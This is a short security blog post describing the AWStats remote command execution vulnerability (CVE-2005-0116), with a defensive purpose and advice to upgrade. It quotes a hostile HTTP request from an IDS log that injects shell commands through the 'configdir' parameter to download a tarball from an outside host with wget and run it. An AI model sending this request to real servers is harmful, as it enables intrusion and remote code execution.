“There is no delight in owning anything unshared.”

Cyberattacks December 2011 – AWStats Remote Command Execution Vulnerability

AWStats is a free powerful tool that generates advanced web, streaming, ftp or mail server statistics, graphically. This remote command execution vulnerability [CVE-2005-0116] was first reported back in 2005.

From one of the sample IDS logs:

The source is sending a hostile HTTP request towards the target:
GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;cd%20.a;wget%20http://fbi.php5.sk/qmail.tgz;tar%20-xzvf%20qmail.tgz;cd%20qmail;./start;echo%20;echo| HTTP/1.1

Via this specially-crafted HTTP request, the attacker intends to exploit the bug resides in the awstats.pl perl script. The script does not sanitize correctly the user input for the ‘configdir’ parameter. When ‘awstats.pl’ is run as a CGI (Common Gateway Interface) script, it fails to validate specific inputs which are used in a Perl open() function call. Note here that the bug is only discovered in AWStats version 6.2 and below. By exploiting this vulnerability, a remote attacker could supply AWStats malicious input, potentially allowing the execution of arbitrary code WITH THE RIGHTS of the web server.

Advisories:
Ensure AWStat has been upgraded to the latest version of (6.9 or later)

Any security-related issues on AWStats are available here:

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s